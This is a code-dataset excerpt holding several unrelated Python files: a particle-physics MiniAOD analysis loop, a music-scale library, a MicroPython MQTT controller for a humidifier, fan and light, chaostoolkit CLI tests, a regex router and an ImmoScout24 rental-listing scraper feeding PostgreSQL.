'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012521/0000/step3_inMINIAODSIM_3.root',\n# 'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012521/0000/step3_inMINIAODSIM_5.root',\n# 'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012521/0000/step3_inMINIAODSIM_6.root',\n# 'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012521/0000/step3_inMINIAODSIM_7.root',\n# 'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012521/0000/step3_inMINIAODSIM_8.root',\n# 'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012521/0000/step3_inMINIAODSIM_9.root'\n# ]\nevents = Events(listFiles)\n#events = Events('step3_inMINIAODSIM_rerereco_all.root')\n\nfor iev,event in enumerate(events):\n #if iev >= 100: break \n event.getByLabel(genParLabel, genpars)\n event.getByLabel(pgenParLabel, pgenpars)\n event.getByLabel(muonLabel, muons)\n event.getByLabel(electronLabel, electrons)\n event.getByLabel(photonLabel, photons)\n event.getByLabel(tauLabel, taus)\n event.getByLabel(jetLabel, jets)\n event.getByLabel(fatjetLabel, fatjets)\n event.getByLabel(metLabel, mets)\n event.getByLabel(vertexLabel, vertices)\n event.getByLabel(vertexLabel, verticesScore)\n event.getByLabel(pfcandLabel,pfcands)\n print(\"\\nEvent: run %6d, lumi %4d, event %12d\" % (event.eventAuxiliary().run(), event.eventAuxiliary().luminosityBlock(),event.eventAuxiliary().event()))\n\n # Vertices \n if len(vertices.product()) == 0 or vertices.product()[0].ndof() < 4:\n print(\"Event has no good primary vertex.\")\n continue\n else:\n PV = vertices.product()[0]\n print(\"PV at x,y,z = run %6d, event %10d, %+15.13f, %+15.13f, %+16.13f, ndof: %.1f, score: (pt2 of clustered objects) %.11f\" % (event.eventAuxiliary().run(), event.eventAuxiliary().event(), PV.x(), PV.y(), PV.z(), PV.ndof(),verticesScore.product().get(0)))\n\n # GenParticles\n for i,genp in enumerate(genpars.product()): \n if genp.pt() < 5 : continue\n print(\"genpar: run %6d, event %10d, pt %4.1f, eta %5.2f, phi %5.2f, pdgId %d.\" % (\n event.eventAuxiliary().run(), event.eventAuxiliary().event(), genp.pt(), genp.eta(), genp.phi(), genp.pdgId()))\n\n # PackedGenParticles\n for i,pgenp in enumerate(pgenpars.product()): \n if pgenp.pt() < 5 : continue\n print(\"pgenpar: run %6d, event %10d, pt %4.1f, eta %5.2f, phi %5.2f, pdgId %d.\" % (\n event.eventAuxiliary().run(), event.eventAuxiliary().event(), pgenp.pt(), pgenp.eta(), pgenp.phi(), pgenp.pdgId()))\n\n # Muons\n for i,mu in enumerate(muons.product()): \n if mu.pt() < 5 or not mu.isLooseMuon(): continue\n print(\"muon: run %6d, event %10d, pt %4.1f, dz(PV) %+5.3f, POG loose id %d, tight id %d.\" % (\n event.eventAuxiliary().run(), event.eventAuxiliary().event(), mu.pt(), mu.muonBestTrack().dz(PV.position()), mu.isLooseMuon(), mu.isTightMuon(PV)))\n\n # Electrons\n for i,el in enumerate(electrons.product()):\n if el.pt() < 5: continue\n print(\"elec: run %6d, event %10d, pt %6.2f, supercluster eta %+5.3f, phi %+5.3f, energy %5.2f (raw %5.2f), gsf pt %+5.2f sigmaIetaIeta %.3f (%.3f with full5x5 shower shapes), lost hits %d, pass conv veto %d\" % (\n event.eventAuxiliary().run(), event.eventAuxiliary().event(), el.pt(), el.superCluster().eta(), el.superCluster().phi(), el.superCluster().correctedEnergy(), el.superCluster().energy(), el.gsfTrack().pt(), el.sigmaIetaIeta(), el.full5x5_sigmaIetaIeta(), el.gsfTrack().hitPattern().numberOfLostHits(ROOT.reco.HitPattern.MISSING_INNER_HITS), el.passConversionVeto()))\n match = False\n for i,genp in enumerate(genpars.product()):\n if abs(genp.pdgId()) == 11:\n if deltaR2(genp,el)<0.01:\n genmatch = genp\n match = True\n if match :\n H_ElectronEta.Fill(el.eta())\n else :\n H_ElectronEta_Fake.Fill(el.eta())\n \n # Photon\n for i,pho in enumerate(photons.product()):\n if pho.pt() < 20 or pho.chargedHadronIso()/pho.pt() > 0.3: continue\n print(\"phot: run %6d, event %10d, pt %4.1f, supercluster eta %+5.3f, sigmaIetaIeta %.3f (%.3f with full5x5 shower shapes)\" % (\n event.eventAuxiliary().run(), event.eventAuxiliary().event(), pho.pt(), pho.superCluster().eta(), pho.sigmaIetaIeta(), pho.full5x5_sigmaIetaIeta()))\n\n # Tau\n for i,tau in enumerate(taus.product()):\n if tau.pt() < 20: continue\n print(\"tau: run %6d, event %10d, pt %4.1f, dxy signif %.1f, ID(byMediumCombinedIsolationDeltaBetaCorr3Hits) %.1f, lead candidate pt %.1f, pdgId %d \" % (\n event.eventAuxiliary().run(), event.eventAuxiliary().event(), tau.pt(), tau.dxy_Sig(), tau.tauID(\"byMediumCombinedIsolationDeltaBetaCorr3Hits\"), tau.leadCand().pt(), tau.leadCand().pdgId()))\n\n # Jets (standard AK4)\n for i,j in enumerate(jets.product()):\n if j.pt() < 20: continue\n print(\"jet: run %6d, event %10d, pt %5.1f (raw pt %5.1f, matched-calojet pt %5.1f), eta %+4.2f, btag run1(CSV) ) %.3f, run2(pfCSVIVFV2) %.3f, pileup mva disc %+.2f\" % (\n event.eventAuxiliary().run(), event.eventAuxiliary().event(), j.pt(), j.pt()*j.jecFactor('Uncorrected'), j.userFloat(\"caloJetMap:pt\"), j.eta(), max(0,j.bDiscriminator(\"combinedSecondaryVertexBJetTags\")), max(0,j.bDiscriminator(\"pfCombinedInclusiveSecondaryVertexV2BJetTags\")), j.userFloat(\"pileupJetId:fullDiscriminant\")))\n # if i == 0: # for the first jet, let's print the leading constituents\n # constituents = [ j.daughter(i2) for i2 in xrange(j.numberOfDaughters()) ]\n # constituents.sort(key = lambda c:c.pt(), reverse=True)\n # for i2, cand in enumerate(constituents):\n # if i2 > 4: \n # print \" .....\"\n # break\n # print \" constituent %3d: pt %6.2f, dz(pv) %+.3f, pdgId %+3d\" % (i2,cand.pt(),cand.dz(PV.position()),cand.pdgId()) \n\n # pfcands\n for i,j in enumerate(pfcands.product()):\n if j.pt() < 0: continue\n print(\"pfcands: run %6d, event %10d, pt %5.1f eta %5.2f pdgId %5d %5.3f %5.3f \" % ( event.eventAuxiliary().run(), event.eventAuxiliary().event(), j.pt(), j.eta(), j.pdgId(), j.rawCaloFraction(), j.rawHcalFraction()))\n\n # Fat AK8 Jets\n # for i,j in enumerate(fatjets.product()):\n # print \"jetAK8 %3d: pt %5.1f (raw pt %5.1f), eta %+4.2f, mass %5.1f ungroomed, %5.1f softdrop, %5.1f pruned, %5.1f trimmed, %5.1f filtered. CMS TopTagger %.1f\" % (\n # i, j.pt(), j.pt()*j.jecFactor('Uncorrected'), j.eta(), j.mass(), j.userFloat('ak8PFJetsCHSSoftDropMass'), j.userFloat('ak8PFJetsCHSPrunedMass'), j.userFloat('ak8PFJetsCHSTrimmedMass'), j.userFloat('ak8PFJetsCHSFilteredMass'), j.userFloat(\"cmsTopTagPFJetsCHSMassAK8\"))\n\n # # To get the constituents of the AK8 jets, you have to loop over all of the\n # # daughters recursively. To save space, the first two constituents are actually\n # # the Soft Drop SUBJETS, which will then point to their daughters.\n # # The remaining constituents are those constituents removed by soft drop but\n # # still in the AK8 jet.\n # constituents = []\n # for ida in xrange( j.numberOfDaughters() ) :\n # cand = j.daughter(ida)\n # if cand.numberOfDaughters() == 0 :\n # constituents.append( cand )\n # else :\n # for jda in xrange( cand.numberOfDaughters() ) :\n # cand2 = cand.daughter(jda)\n # constituents.append( cand2 )\n # constituents.sort(key = lambda c:c.pt(), reverse=True)\n # for i2, cand in enumerate(constituents):\n # if i2 > 4: \n # print \" .....\"\n # break\n # print \" constituent %3d: pt %6.2f, pdgId %+3d, #dau %+3d\" % (i2,cand.pt(),cand.pdgId(), cand.numberOfDaughters()) \n \n # wSubjets = j.subjets('SoftDrop') \n # for iw,wsub in enumerate( wSubjets ) :\n # print \" w subjet %3d: pt %5.1f (raw pt %5.1f), eta %+4.2f, mass %5.1f \" % (\n # iw, wsub.pt(), wsub.pt()*wsub.jecFactor('Uncorrected'), wsub.eta(), wsub.mass()\n # )\n # tSubjets = j.subjets('CMSTopTag')\n # for it,tsub in enumerate( tSubjets ) :\n # print \" t subjet %3d: pt %5.1f (raw pt %5.1f), eta %+4.2f, mass %5.1f \" % (\n # it, tsub.pt(), tsub.pt()*tsub.jecFactor('Uncorrected'), tsub.eta(), tsub.mass()\n # )\n\nf = ROOT.TFile.Open(\"myfile.root\",\"RECREATE\")\nH_ElectronEta.Write()\nH_ElectronEta_Fake.Write()\n#ROOT.TFile.Close(f)\nf.Write()\nf.Close()\n","sub_path":"FWLite/python/run_miniaod_plots.py","file_name":"run_miniaod_plots.py","file_ext":"py","file_size_in_byte":12521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"465608405","text":"class MelopyGenericError(Exception): pass\nclass MelopyValueError(ValueError): pass\n\nfrom utility import key_from_note, note_from_key\n\ndef bReturn(output, Type):\n \"\"\"Returns a selected output assuming input is a list\"\"\"\n if isinstance(output, list):\n if Type.lower() == \"list\":\n return output\n elif Type.lower() == \"tuple\":\n return tuple([i for i in output])\n elif Type.lower() == \"dict\":\n O = {}\n for i in range(len(output)):\n O[i] = output[i]\n return O\n elif Type.lower() == \"string\":\n return ','.join(output)\n elif Type.lower() == \"stringspace\":\n return ' '.join(output)\n else:\n raise MelopyGenericError(\"Unknown type: \" + Type)\n else:\n raise MelopyGenericError(\"Input to bReturn is not a list! Input: \" + str(output))\n\ndef iterate(start, pattern, rType=\"list\"):\n \"\"\"Iterates over a pattern starting at a given note\"\"\"\n start_key = key_from_note(start)\n ret = [start_key]\n for step in pattern:\n ret.append(ret[-1] + step)\n ret = map(note_from_key, ret)\n return bReturn(ret, rType)\n \n# TODO move Exceptions into a file 'melopy.exception'\nclass UnknownScale(Exception):\n \"\"\"\n Exception class for unknown scales\n \"\"\"\n def __init__(self, unknownScale, scaleClass) :\n \"\"\"\n Constructor.\n\n @param unknownScale: Name of unknown scale\n @type unknownScale: str\n \"\"\"\n self.err = 'Given scale \"{}\" is unknown. Known scales are:\\n{}\\n'.format(\n unknownScale, \n ' '.join(scaleClass.ScaleIntervals.keys()))\n\n def __str__(self):\n return self.err\n\n\nclass UnknownTriad(Exception):\n \"\"\"\n Exception class for unknown triads\n \"\"\"\n def __init__(self, unknownTriad) :\n \"\"\"\n Constructor.\n\n @param unknownTriad: Name of unknown scale\n @type unknownTriad: str\n \"\"\"\n self.err = 'Given triad \"{}\" is unknown. Known triads are:\\n{}\\n'.format(\n unknownTriad, \n ' '.join(DiatonicScale.Triad.Roots.keys()))\n\n def __str__(self):\n return self.err\n\n\n\nclass Scale(object):\n \"\"\"\n Scale will be used to obtain information about those scale... e. g.:\n \n - provide special information for different scales\n - get triad as iterable or chord (tonic, subdominant, dominant) [only in diatonic]\n - get parallel moll\n - iterate over scale (__iter__)\n \"\"\"\n\n def __init__(self, root, scaleIntervals):\n \"\"\"\n Constructor.\n\n @param root: root note of scale\n @param scaleIntervals: list contains intervals to build scale from given root note.\n \"\"\"\n #: List representation of scale\n self.scale = iterate(root, scaleIntervals, \"list\")\n #: Octave of root ==> octave of scale\n self.octave = int(self.scale[0][-1])\n\n# self.root = root\n# self.rootKey = key_from_note(root)\n# self.scaleIntervals = ScaleIntervals[scale]\n\n def __str__(self):\n return '-'.join(self.scale)\n\n def __iter__(self):\n self.scale\n\n# @property\n# def scale(self):\n# \"\"\"\n# @return: Scale over one octave\n# @rtype: list\n# \"\"\"\n# return [self.root] + [note_from_key(rootKey + interval) for interval in self.scaleIntervals]\n\n def get_note(self, noteIndex):\n \"\"\"\n Returns note at given index in scale.\n\n e.g.::\n diatonic c4 major:\n\n ... a3 b3 c4 d4 e4 f4 g4 a4 b4 c5 d5 e5 ...\n -2 -1 |0 1 2 3 4 5 6| 7 8 9\n \n\n @return: Note in Scale\n @rtype: str\n \"\"\"\n octave = self.octave + noteIndex / len(self.scale)\n \n # TODO Exception class?\n assert octave >= 0, 'This note does not exist!'\n\n # repersenting note in scale 'F#5' -> 'F#'\n # .----------------+--------------------..-+-. \n note = self.scale[noteIndex % len(self.scale)][:-1] + str(octave)\n\n return note\n\n def get_chord(self, noteIndices):\n \"\"\"\n Returns chord.\n\n e.g.::\n get chord Cmaj 1-3-5:\n c4maj.get_chord([0, 2, 4]) --> ['C4', 'E4', 'G4']\n \"\"\"\n chordRootNoteIndex = noteIndices[0]\n chordRootNote = self.get_note(chordRootNoteIndex)\n chord = [chordRootNote] + [self.get_note(chordRootNoteIndex + i) for i in noteIndices[1:]]\n\n return chord\n \n\nclass DiatonicScale(Scale):\n \"\"\"\n DiatonicScale.\n \"\"\"\n\n #: Diatonic scale types\n Minor = 'minor'\n Major = 'major'\n \n #: Scale intervals\n ScaleIntervals = {\n Major : (2,2,1,2,2,2) , \n Minor : (2,1,2,2,1,2) ,\n }\n\n class Triad(object):\n \"\"\"\n Defines Triad for this class.\n \"\"\"\n #: Diatonic triads \n Tonic = 'tonic'\n Supertonic = 'supertonic'\n Mediant = 'mediant'\n Subdominant = 'subdominant'\n Dominant = 'dominant'\n Submediant = 'submediant'\n Subtonic = 'subtonic'\n\n #: Triads root note\n Roots = {\n Tonic : 0 ,\n Supertonic : 1 ,\n Mediant : 2 ,\n Subdominant : 3 ,\n Dominant : 4 ,\n Submediant : 5 ,\n Subtonic : 6 ,\n }\n\n\n def __init__(self, root, scale):\n \"\"\"\n Constructor.\n\n @param root: Root note.\n @param scale: Type of Diatonic scale\n \"\"\"\n if self.ScaleIntervals.has_key(scale):\n Scale.__init__(self, root, self.ScaleIntervals[scale])\n else:\n raise UnknownScale(scale, self)\n\n def get_triad(self, triad, rType=\"list\"):\n \"\"\"\n Getter for scales triads.\n\n @param triad: Name of triad\n @type type: str\n\n @param rType: Name of iterable type\n @type rType: str\n\n @return: Sequence of requested triad of current scale\n @rtype: depends on rType\n \"\"\"\n \n if not self.Triad.Roots.has_key(triad):\n raise UnknownTriad(triad)\n\n return self.get_chord((self.Triad.Roots[triad], 2, 4))\n\n\nclass OctatonicScale(Scale):\n \"\"\"\n Octatonic\n \"\"\"\n\n Half = 'half'\n Whole = 'whole'\n \n ScaleIntervals = {\n Half : (1,2,1,2,1,2,1,2) ,\n Whole : (2,1,2,1,2,1,2,1)\n }\n\n def __init__(self, root, scale):\n \"\"\"\n Constructor.\n \"\"\"\n if self.ScaleIntervals.has_key(scale):\n Scale.__init__(self, root, self.ScaleIntervals[scale])\n else:\n raise UnknownScale(scale, self)\n\nclass MelodicScale(Scale):\n \"\"\"\n Melodic.\n \"\"\"\n\n Major = 'major'\n Minor = 'minor'\n \n ScaleIntervals = {\n Major : (2,2,1,2,1,2) ,\n Minor : (2,1,2,2,2,2)\n }\n \n def __init__(self, root, scale):\n \"\"\"\n Constructor.\n \"\"\"\n if self.ScaleIntervals.has_key(scale):\n Scale.__init__(self, root, self.ScaleIntervals[scale])\n else:\n raise UnknownScale(scale, self)\n\n\n\nclass HarmonicScale(Scale):\n \"\"\"\n Harmonic.\n \"\"\"\n\n Major = 'major'\n Minor = 'minor'\n\n ScaleIntervals = {\n Major : (2,2,1,2,1,3) ,\n Minor : (2,1,2,2,1,3)\n }\n \n def __init__(self, root, scale):\n \"\"\"\n Constructor.\n \"\"\"\n if self.ScaleIntervals.has_key(scale):\n Scale.__init__(self, root, self.ScaleIntervals[scale])\n else:\n raise UnknownScale(scale, self)\n\n\nclass PentatonicScale(Scale):\n \"\"\"\n Pentatonic.\n \"\"\"\n Major = 'major'\n Minor = 'minor'\n\n\n #: Dictionary, which contains intervals for previously defined scale names.\n #: Building scales by using this intervals.\n ScaleIntervals = {\n Major : (2,2,3,2) ,\n Minor : (3,2,2,3) ,\n }\n\n def __init__(self, root, scale):\n \"\"\"\n Constructor.\n \"\"\"\n if self.ScaleIntervals.has_key(scale):\n Scale.__init__(self, root, self.ScaleIntervals[scale])\n else:\n raise UnknownScale(scale, self)\n\n\nclass ChromaticScale(Scale):\n \"\"\"\n Chromatic.\n \"\"\"\n\n def __init__(self, root):\n \"\"\"\n Constructor.\n \"\"\"\n Scale.__init__(self, root, (1,1,1,1,1,1,1,1,1,1,1)) \n\n\n# Licensed under The MIT License (MIT)\n# See LICENSE file for more\n","sub_path":"melopy/scales.py","file_name":"scales.py","file_ext":"py","file_size_in_byte":8568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"442012287","text":"from umqtt.robust import MQTTClient\nimport dht\nimport machine\nimport utime\nimport webrepl\nimport ntptime\n\nntptime.settime()\n\nwebrepl.start()\n\nclient_id = '12345'\nmqtt_server = '192.168.2.67'\ntopic_sub = b'SMOKESHOW/relays/#'\n\nprint('\\n\\nWelcome to Operation SMOKESHOW\\nVersion Delta - 6/8/2020\\nThreat Level: Midnight\\n')\n\nclient = MQTTClient(client_id, mqtt_server)\nclient.connect()\n\nd = dht.DHT22(machine.Pin(4, machine.Pin.IN, machine.Pin.PULL_UP))\n\nled = machine.Pin(2, machine.Pin.OUT)\n\np12 = machine.Pin(12, machine.Pin.OUT) # relay 1 - fan\np5 = machine.Pin(5, machine.Pin.OUT) # relay - 4 humidifier fan\np13 = machine.Pin(13, machine.Pin.OUT) # relay 3 - led\np14 = machine.Pin(14, machine.Pin.OUT) # relay 2 - humidifier\n\npins = [p12, p5, p13, p14, led]\nfor i in pins[:]:\n i.on()\n\ndef sub_cb(topic, msg):\n print((topic, msg))\n if topic == b'SMOKESHOW/relays/light' and msg == b'on':\n p13.off() \n elif topic == b'SMOKESHOW/relays/light' and msg == b'off':\n p13.on()\n if topic == b'SMOKESHOW/relays/fan' and msg == b'on':\n p12.off()\n elif topic == b'SMOKESHOW/relays/fan' and msg == b'off':\n p12.on()\n if topic == b'SMOKESHOW/relays/humidifier' and msg == b'on':\n p14.off()\n p5.off()\n elif topic == b'SMOKESHOW/relays/humidifier' and msg == b'off':\n p14.on()\n p5.on()\n\n\ndef connect_and_subscribe():\n global client_id, mqtt_server, topic_sub\n client = MQTTClient(client_id, mqtt_server)\n client.set_callback(sub_cb)\n client.connect()\n client.subscribe(topic_sub)\n print('Connected to: %s \\nSubscribed to: %s' % (mqtt_server, topic_sub))\n return client\n\ndef restart_and_reconnect():\n print('Failed to connect to MQTT broker. Reconnecting...')\n time.sleep(10)\n machine.reset()\n\ntry:\n client = connect_and_subscribe()\nexcept OSError as e:\n restart_and_reconnect()\n\nwhile True:\n led.off()\n utime.sleep_ms(50)\n led.on()\n utime.sleep_ms(950) # wait 2 seconds, must be at least 750 ms for DHT22 sensor\n d.measure() # measure temp + hum\n client.publish('fruits_temp', str(d.temperature())) # publishes temp to mqtt broker\n client.publish('fruits_hum', str(d.humidity())) # publishes hum to mqtt broker\n \n # Humidifier turns on fist 4 minutes of each hour or if under 98% humidity.\n if d.humidity() < 98:\n p14.off()\n p5.off()\n elif utime.localtime()[4] < 2:\n p14.off()\n p5.off()\n elif topic == b'SMOKESHOW/relays/humidifier' and msg == b'on':\n p14.off()\n p5.off()\n else:\n p14.on()\n p5.on()\n # Fan turns on for the last 2 minutes of every hour.\n if utime.localtime()[4] > 57: \n p12.off()\n elif topic == b'SMOKESHOW/relays/fan' and msg == b'on':\n p12.off()\n else:\n p12.on()\n # LED turns on for the first 5 minutes of every hour.\n if utime.localtime()[4] < 5: \n p13.off()\n elif topic == b'SMOKESHOW/relays/light' and msg == b'on':\n p13.off()\n else:\n p13.on()\n \n # Terminal prints & debugging\n print('Operation SmokeShow')\n print('----------------------------------') \n print(machine.RTC().datetime())\n print('Humidity: ' + str(d.humidity()) + ' %')\n print('Temperature: ' + str(d.temperature()) + ' C')\n\n if p12.value() == 0:\n print('Fan ON')\n else:\n print('Fan OFF')\n if p13.value() == 0:\n print('Lights ON')\n else:\n print('Lights OFF')\n if p14.value() == 0:\n print('Humidifier ON')\n else:\n print('Humidifier OFF')\n if p5.value() == 0:\n print('Humidifier Fan ON')\n else:\n print('Humidifier Fan OFF')\n print('..................................')\n\n try:\n client.check_msg()\n except OSError as e:\n restart_and_reconnect()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"522765299","text":"# -*- coding: utf-8 -*-\nimport os\n\nfrom chaoslib.settings import CHAOSTOOLKIT_CONFIG_PATH\nimport click\nfrom click.testing import CliRunner\n\nfrom chaostoolkit.cli import cli\n\n\ndef test_source_experiment_is_mandatory():\n runner = CliRunner()\n result = runner.invoke(cli, ['run'])\n assert result.exit_code == 2\n assert result.exception\n assert 'Error: Missing argument \"source\".' in result.output\n\n\ndef test_source_path_must_exist(log_file):\n runner = CliRunner()\n result = runner.invoke(cli, [\n '--log-file', log_file.name, 'run', 'invalid.jsn'])\n assert result.exit_code == 1\n assert result.exception\n\n log_file.seek(0)\n log = log_file.read().decode('utf-8')\n assert 'Path \"invalid.jsn\" does not exist.' in log\n\n\ndef test_default_settings_file(log_file):\n runner = CliRunner()\n exp_path = os.path.join(\n os.path.dirname(__file__), 'fixtures', 'well-formed-experiment.json')\n result = runner.invoke(cli, [\n '--log-file', log_file.name, 'run', exp_path])\n assert result.exit_code == 1\n\n log_file.seek(0)\n log = log_file.read().decode('utf-8')\n message = \"Using settings file '{}'\".format(CHAOSTOOLKIT_CONFIG_PATH)\n assert message in log\n\n\ndef test_specify_settings_file(log_file):\n runner = CliRunner()\n settings_path = os.path.join(\n os.path.dirname(__file__), 'fixtures', 'fake_settings.yaml')\n exp_path = os.path.join(\n os.path.dirname(__file__), 'fixtures', 'well-formed-experiment.json')\n result = runner.invoke(cli, [\n '--log-file', log_file.name, '--settings', settings_path, 'run',\n exp_path])\n assert result.exit_code == 1\n\n log_file.seek(0)\n log = log_file.read().decode('utf-8')\n message = \"Using settings file '{}'\".format(settings_path)\n assert message in log\n","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"55783780","text":"import re\nfrom l33ty.utils.dynamicimport import import_y, from_x_import_y\nfrom l33ty.core.exceptions import ImproperlyConfigured\n\nclass RegexRoutePattern(object):\n\n def __init__(self, regex, view, kwargs=None):\n if kwargs is None:\n self.kwargs = {}\n\n self.regex = re.compile(regex)\n self.view = self._get_view(view)\n\n def _get_view(self, view):\n try:\n module = import_y(''.join(view.split('.')[:-1]))\n view_func = getattr(module, view.split('.')[-1])\n except (ImportError, AttributeError):\n raise ImproperlyConfigured('View function {0} does not exist'.format(view))\n return view_func\n\n def match(self, raw):\n results = self.regex.search(raw)\n if results is not None:\n return results.groupdict()\n else:\n return False\n\n\nclass RegexRouteResolver(object):\n\n def __init__(self, routepatterns):\n if isinstance(routepatterns, basestring):\n try:\n routeconf = import_y(routepatterns)\n except ImportError:\n raise ImproperlyConfigured('Routeconf {0} could not be imported'.format(routepatterns))\n try:\n self.patterns = getattr(routeconf, 'routepatterns')\n except AttributeError:\n raise ImproperlyConfigured('Routeconf {0} has no routepatterns attribute'.format(routepatterns))\n else:\n self.patterns = routepatterns\n\n def resolve(self, req):\n for route in self.patterns:\n if isinstance(route, RegexRouteResolver):\n out = route.resolve(req)\n if out is not None:\n return out\n\n kwargs = route.match(req.msg)\n if kwargs:\n kwargs.update(route.kwargs)\n return route.view, kwargs\n\n return None\n","sub_path":"l33ty/core/routeresolvers.py","file_name":"routeresolvers.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"145916706","text":"\n# coding: utf-8\n\n# In[1]:\nimport requests\nimport json\nfrom requests_oauthlib import OAuth1\nimport psycopg2\n\n\n# In[2]:\n\ntry:\n\timport secrets\nexcept ImportError:\n\tprint(\"could not import secrets.py\")\n\ntry:\n atlasdbconn = psycopg2.connect(\"dbname='{name}' user='{user}' host='{host}' password='{pw}'\".format(**secrets.db))\nexcept Exception:\n print(\"Unable to connect to db\")\n\n\n# In[3]:\n\natlasdbcursor = atlasdbconn.cursor()\n\n\n# In[4]:\n\nsql = \"SELECT max(downloaded) FROM is24rent\"\natlasdbcursor.execute(sql)\nlastlist = atlasdbcursor.fetchall()\nlast = lastlist[0][0]\n\n\n# In[5]:\n\nbaseurl = 'https://rest.immobilienscout24.de/restapi/api/search/v1.0/search/region?realestatetype=apartmentrent&geocodes=1276003&firstactivation='+last\nheaders = {\"Accept\": \"application/json\",\"charset\": \"UTF-8\"}\nauth = OAuth1(\n\tsecrets.immoscout_auth['api_key'], \n\tsecrets.immoscout_auth['api_secret'], \n\tsecrets.immoscout_auth['access_token'], \n\tsecrets.immoscout_auth['token_secret'],\n)\n\n\n# In[6]:\n\nis24 = requests.get(url=baseurl,auth=auth, headers=headers)\n\n\n# In[7]:\n\nis24parsed = json.loads(is24.content)\n\n\n# In[8]:\n\nis24parsed['page1'] = is24parsed.pop('resultlist.resultlist')\n\n\n# In[9]:\n\n# this object is identical with is24parsed. I use them to concatenate the pages\nparsed = json.loads(is24.content)\n\n\n# In[10]:\n\n#'The following lines are used to store each page\nnumberOfPages = parsed['resultlist.resultlist']['paging']['numberOfPages']\ncurrentPageNumber = parsed['resultlist.resultlist']['paging']['pageNumber']\n\n\n# In[11]:\n\nwhile currentPageNumber < numberOfPages:\n currentPageNumber = currentPageNumber +1\n url = baseurl + '&pagenumber=' + str(currentPageNumber)\n nextPage = requests.get(url=url, auth=auth, headers=headers)\n parsed = json.loads(nextPage.content)\n ''' The result is a dict with just one key ('resultlist.resultlist'). \n Using update(), values would be overwritten each time. That's I overwrite each page\n with the pagenumber '''\n parsed['page'+ str(currentPageNumber)] = parsed.pop('resultlist.resultlist')\n is24parsed.update(parsed)\n\n\n# In[12]:\n\nimport time\nzeit = time.localtime()\nyear,mon,day,hour,mi,sec = zeit[0:6]\ndownloaded = '{0:4d}-{1:02d}-{2:02d}T{3:02d}:{4:02d}:{5:02d}'.format(year,mon,day,hour,mi,sec)\n\n\n# In[13]:\n\nfeatures = []\nfor key in is24parsed:\n page = is24parsed[key]\n for item in page['resultlistEntries'][0]['resultlistEntry']:\n if 'wgs84Coordinate' in item['resultlist.realEstate']['address']:\n longitude = item['resultlist.realEstate']['address']['wgs84Coordinate']['longitude']\n latitude = item['resultlist.realEstate']['address']['wgs84Coordinate']['latitude']\n else:\n longitude = None\n latitude = None\n coordinates = [longitude, latitude]\n geometry = {\n \"type\": \"Point\",\n \"coordinates\": coordinates\n }\n \n # es müssten sich gemeinsamkeiten finden lassen, um das hier deutlich zu vereinfachen\n if 'preciseHouseNumber' in item['resultlist.realEstate']['address']:\n preciseHouseNumber = item['resultlist.realEstate']['address']['preciseHouseNumber']\n else:\n preciseHouseNumber = None\n \n if 'street' in item['resultlist.realEstate']['address']:\n street = item['resultlist.realEstate']['address']['street']\n else:\n street = None\n \n if 'houseNumber' in item['resultlist.realEstate']['address']:\n houseNumber = item['resultlist.realEstate']['address']['houseNumber']\n else:\n houseNumber = None\n \n \n properties = {\n 'downloaded':downloaded,\n 'published': item['@publishDate'],\n 'is24id': item['@id'],\n 'city': item['resultlist.realEstate']['address']['city'],\n 'quarter': item['resultlist.realEstate']['address']['quarter'],\n 'precisehousenumber': preciseHouseNumber,\n 'street': street,\n 'housenumber': houseNumber,\n 'postcode': item['resultlist.realEstate']['address']['postcode'],\n 'livingspace': item['resultlist.realEstate']['livingSpace'],\n 'numberofrooms': item['resultlist.realEstate']['numberOfRooms'],\n 'balcony': item['resultlist.realEstate']['balcony'],\n 'garden': item['resultlist.realEstate']['garden'],\n 'builtinkitchen': item['resultlist.realEstate']['builtInKitchen'],\n 'price': item['resultlist.realEstate']['price']['value'],\n 'currency': item['resultlist.realEstate']['calculatedPrice']['currency'],\n 'calculatedprice': item['resultlist.realEstate']['calculatedPrice']['value'],\n 'rentscope': item['resultlist.realEstate']['calculatedPrice']['rentScope'],\n 'priceinterval': item['resultlist.realEstate']['calculatedPrice']['priceIntervalType'],\n 'is24customerid': item['resultlist.realEstate']['companyWideCustomerId'],\n 'privateoffer': item['resultlist.realEstate']['privateOffer']\n }\n feature = {\n \"type\": \"Feature\",\n \"properties\": properties,\n \"geometry\": geometry\n }\n features.append(feature)\n\n\n# In[14]:\n\ngeojson = {\n \"type\": \"FeatureCollection\",\n \"crs\": { \"type\": \"name\", \"properties\": { \"name\": \"urn:ogc:def:crs:OGC:1.3:CRS84\" } },\n \"features\": features\n}\n\nimport os\ncurrentpath = os.getcwd()\nwith open(currentpath+'/geojson/is24rent_after'+downloaded+'.geojson', 'w') as outfile:\n json.dump(geojson, outfile, indent=4)\n\n\n# In[15]:\n\ndef insert_point(x,y,is24id):\n sql = \"UPDATE is24rent SET geom = ST_SetSRID(ST_MakePoint(%s, %s), 4326) where is24id = %s\"\n atlasdbcursor.execute(sql,(x,y,is24id))\n\n\n# In[16]:\n\nfrom psycopg2.extensions import AsIs\n\n\n# In[17]:\n\nfor feat in features:\n props = feat['properties']\n propkeys = props.keys()\n propvalues = [props[propkey] for propkey in propkeys]\n sql = atlasdbcursor.mogrify(\"INSERT INTO is24rent (%s) VALUES %s\", (AsIs(','.join(propkeys)), tuple(propvalues)))\n atlasdbcursor.execute(sql)\n x = feat['geometry']['coordinates'][0]\n y = feat['geometry']['coordinates'][1]\n is24id = props['is24id']\n insert_point(x, y,is24id) \n\n\n# In[18]:\n\natlasdbconn.commit()\n\n\n# 